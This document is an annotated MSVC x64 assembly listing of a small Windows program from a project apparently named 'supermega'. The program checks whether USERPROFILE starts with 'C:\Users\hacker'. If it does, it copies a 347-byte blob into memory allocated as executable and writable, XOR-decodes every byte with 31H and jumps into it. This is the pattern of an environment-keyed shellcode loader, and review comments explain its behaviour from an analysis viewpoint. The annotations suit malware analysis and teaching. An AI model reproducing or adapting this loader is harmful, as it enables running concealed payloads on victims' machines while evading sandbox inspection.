; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0
;
; Syntax: MASM (Intel operand order). ABI: Microsoft x64 (args in rcx, rdx, r8, r9).
; The unit defines two routines: mystrcmp, a UTF-16 string comparison helper, and main,
; which checks the USERPROFILE environment variable against a fixed path and, on a match,
; copies 347 bytes from supermega_payload into freshly allocated memory, XORs each byte
; with 31H and calls the result.

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

; supermega_payload is a communal QWORD; main loads it and uses the value as the source
; pointer of the byte copy.
_DATA   SEGMENT
COMM    supermega_payload:QWORD
_DATA   ENDS
PUBLIC  main
PUBLIC  mystrcmp
EXTRN   __imp_GetEnvironmentVariableW:PROC
EXTRN   __imp_VirtualAlloc:PROC
; Exception-directory entries: start, end and unwind-info RVA of each function.
pdata   SEGMENT
$pdata$main DD imagerel $LN8
        DD imagerel $LN8+266
        DD imagerel $unwind$main
$pdata$mystrcmp DD imagerel $LN6
        DD imagerel $LN6+109
        DD imagerel $unwind$mystrcmp
pdata   ENDS
_DATA   SEGMENT
; UTF-16LE L"USERPROFILE" with terminator: 12 code units, 24 bytes.
$SG72513 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H
        DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H
; UTF-16LE L"C:\Users\hacker" with terminator: 16 code units, 32 bytes.
; This is the value the environment check in main compares against.
$SG72514 DB 'C', 00H, ':', 00H, '\', 00H, 'U', 00H, 's', 00H, 'e', 00H
        DB 'r', 00H, 's', 00H, '\', 00H, 'h', 00H, 'a', 00H, 'c', 00H, 'k'
        DB 00H, 'e', 00H, 'r', 00H, 00H, 00H
_DATA   ENDS
xdata   SEGMENT
$unwind$main DD 040a01H
        DD 010f010aH
        DD 060027003H
$unwind$mystrcmp DD 010e01H
        DD 0220eH
xdata   ENDS
; Function compile flags: /Odtp
_TEXT   SEGMENT
i$ = 0
str1$ = 32
str2$ = 40
;-----------------------------------------------------------------------
; mystrcmp(str1, str2) - compare two strings of 16-bit code units
; ABI:   Microsoft x64
; In:    rcx = str1, rdx = str2 (both homed to the caller's shadow space)
; Out:   eax = 1 at the first index where the code units differ,
;        eax = 0 when either string reaches its terminator first
; Clobb: rax, rcx, rdx, flags
; Stack: 24 bytes of locals; i$ is the 32-bit loop index
; NOTE(review): the loop stops as soon as EITHER string ends, so 0 is also
; returned when one string is only a prefix of the other; this is a prefix
; match, not full equality.
;-----------------------------------------------------------------------
mystrcmp PROC
; File C:\Users\hacker\source\repos\supermega\build\main.c
; Line 40
$LN6:
        ; Home the register arguments; after the sub below they are reachable
        ; as str1$[rsp] (24+8) and str2$[rsp] (24+16).
        mov QWORD PTR [rsp+16], rdx
        mov QWORD PTR [rsp+8], rcx
        sub rsp, 24
; Line 41
        mov DWORD PTR i$[rsp], 0
$LN2@mystrcmp:
; Line 42
        ; Loop condition: str1[i] != 0 && str2[i] != 0 (index scaled by 2 bytes).
        movsxd rax, DWORD PTR i$[rsp]
        mov rcx, QWORD PTR str1$[rsp]
        movzx eax, WORD PTR [rcx+rax*2]
        test eax, eax
        je SHORT $LN3@mystrcmp
        movsxd rax, DWORD PTR i$[rsp]
        mov rcx, QWORD PTR str2$[rsp]
        movzx eax, WORD PTR [rcx+rax*2]
        test eax, eax
        je SHORT $LN3@mystrcmp
; Line 43
        ; Compare str1[i] with str2[i]; equal units continue at $LN4.
        movsxd rax, DWORD PTR i$[rsp]
        mov rcx, QWORD PTR str1$[rsp]
        movzx eax, WORD PTR [rcx+rax*2]
        movsxd rcx, DWORD PTR i$[rsp]
        mov rdx, QWORD PTR str2$[rsp]
        movzx ecx, WORD PTR [rdx+rcx*2]
        cmp eax, ecx
        je SHORT $LN4@mystrcmp
; Line 44
        ; Mismatch: return 1.
        mov eax, 1
        jmp SHORT $LN1@mystrcmp
$LN4@mystrcmp:
; Line 46
        ; i++
        mov eax, DWORD PTR i$[rsp]
        inc eax
        mov DWORD PTR i$[rsp], eax
; Line 47
        jmp SHORT $LN2@mystrcmp
$LN3@mystrcmp:
; Line 48
        ; A terminator was reached in one of the strings: return 0.
        xor eax, eax
$LN1@mystrcmp:
; Line 49
        add rsp, 24
        ret 0
mystrcmp ENDP
_TEXT   ENDS
; Function compile flags:
; /Odtp   (tail of the "Function compile flags:" comment that ends the previous line)
_TEXT   SEGMENT
n$1 = 32
dest$ = 40
result$ = 48
envVarName$ = 56
tocheck$ = 80
buffer$ = 112
;-----------------------------------------------------------------------
; main - environment-gated copy, XOR-decode and execute of supermega_payload
; ABI:   Microsoft x64
; Out:   eax = 6 when the environment lookup returns 0 or the comparison
;        reports a mismatch; eax = 0 after the call into the decoded buffer
; Saves: rsi, rdi (pushed; used by rep movsb and by the copy loop)
; Stack: 2168-byte frame. envVarName$ (24 bytes) and tocheck$ (32 bytes) are
;        stack copies of the two strings; buffer$ starts at 112 and receives
;        the variable's value; n$1 is the loop index, dest$ the allocation.
; NOTE(review), analysis view: the observable sequence is VirtualAlloc with
; protection 40H (PAGE_EXECUTE_READWRITE), a byte-wise write into that region,
; then an indirect call into it. The decode key is the single constant 31H
; and the length is the constant 347, so the bytes behind supermega_payload
; can be recovered statically without running the program.
;-----------------------------------------------------------------------
main PROC
; File C:\Users\hacker\source\repos\supermega\build\main.c
; Line 6
$LN8:
        push rsi
        push rdi
        sub rsp, 2168 ; 00000878H
; Line 10
        ; Copy 24 bytes (the size of $SG72513, L"USERPROFILE") into envVarName$.
        ; The DB line is raw bytes standing where an instruction would be; per its
        ; own comment it represents loading the address of $SG72513 into rcx.
        ; NOTE(review): presumably a placeholder rewritten by the build tooling;
        ; the bytes as listed are not decoded here.
        lea rax, QWORD PTR envVarName$[rsp]
        DB 0b1H, 070H, 04bH, 02fH, 095H ; .rdata Reuse for $SG72513 (rcx)
        mov rdi, rax
        mov rsi, rcx
        mov ecx, 24
        rep movsb
; Line 11
        ; Same pattern for $SG72514: 32 bytes (L"C:\Users\hacker") into tocheck$.
        lea rax, QWORD PTR tocheck$[rsp]
        DB 0eeH, 0c0H, 0a1H, 044H, 0d6H ; .rdata Reuse for $SG72514 (rcx)
        mov rdi, rax
        mov rsi, rcx
        mov ecx, 32 ; 00000020H
        rep movsb
; Line 13
        ; result = GetEnvironmentVariableW(envVarName, buffer, 1024)
        mov r8d, 1024 ; 00000400H
        lea rdx, QWORD PTR buffer$[rsp]
        lea rcx, QWORD PTR envVarName$[rsp]
        call QWORD PTR __imp_GetEnvironmentVariableW
        mov DWORD PTR result$[rsp], eax
; Line 14
        ; A zero result takes the early exit with return value 6.
        cmp DWORD PTR result$[rsp], 0
        jne SHORT $LN5@main
; Line 15
        mov eax, 6
        jmp $LN1@main
$LN5@main:
; Line 17
        ; Environment gate: mystrcmp(buffer, tocheck) must return 0 to continue.
        ; Because mystrcmp stops at the first terminator in either string, a value
        ; that merely begins with the expected path also returns 0.
        lea rdx, QWORD PTR tocheck$[rsp]
        lea rcx, QWORD PTR buffer$[rsp]
        call mystrcmp
        test eax, eax
        je SHORT $LN6@main
; Line 18
        mov eax, 6
        jmp SHORT $LN1@main
$LN6@main:
; Line 23
        ; dest = VirtualAlloc(NULL, 347, 3000H, 40H)
        ;   3000H = MEM_COMMIT | MEM_RESERVE, 40H = PAGE_EXECUTE_READWRITE.
        ; The returned pointer is stored without a NULL check; if the allocation
        ; fails, the loop below writes through a null pointer.
        mov r9d, 64 ; 00000040H
        mov r8d, 12288 ; 00003000H
        mov edx, 347 ; 0000015bH
        xor ecx, ecx
        call QWORD PTR __imp_VirtualAlloc
        mov QWORD PTR dest$[rsp], rax
; Line 29
        ; for (n = 0; n < 347; n++)
        mov DWORD PTR n$1[rsp], 0
        jmp SHORT $LN4@main
$LN2@main:
        mov eax, DWORD PTR n$1[rsp]
        inc eax
        mov DWORD PTR n$1[rsp], eax
$LN4@main:
        cmp DWORD PTR n$1[rsp], 347 ; 0000015bH
        jge SHORT $LN3@main
; Line 30
        ; dest[n] = supermega_payload[n]; the QWORD at supermega_payload is
        ; loaded into rdi and used as the source pointer.
        movsxd rax, DWORD PTR n$1[rsp]
        movsxd rcx, DWORD PTR n$1[rsp]
        mov rdx, QWORD PTR dest$[rsp]
        mov rdi, QWORD PTR supermega_payload
        movzx eax, BYTE PTR [rdi+rax]
        mov BYTE PTR [rdx+rcx], al
; Line 31
        ; dest[n] ^= 31H; the same one-byte key is applied to every position.
        movsxd rax, DWORD PTR n$1[rsp]
        mov rcx, QWORD PTR dest$[rsp]
        movsx eax, BYTE PTR [rcx+rax]
        xor eax, 49 ; 00000031H
        movsxd rcx, DWORD PTR n$1[rsp]
        mov rdx, QWORD PTR dest$[rsp]
        mov BYTE PTR [rdx+rcx], al
; Line 32
        jmp SHORT $LN2@main
$LN3@main:
; Line 35
        ; Indirect call through dest$: control transfers into the decoded buffer.
        call QWORD PTR dest$[rsp]
; Line 37
        xor eax, eax
$LN1@main:
; Line 38
        ; Common exit: release the frame and restore rdi/rsi in reverse push order.
        add rsp, 2168 ; 00000878H
        pop rdi
        pop rsi
        ret 0
main ENDP
_TEXT   ENDS
END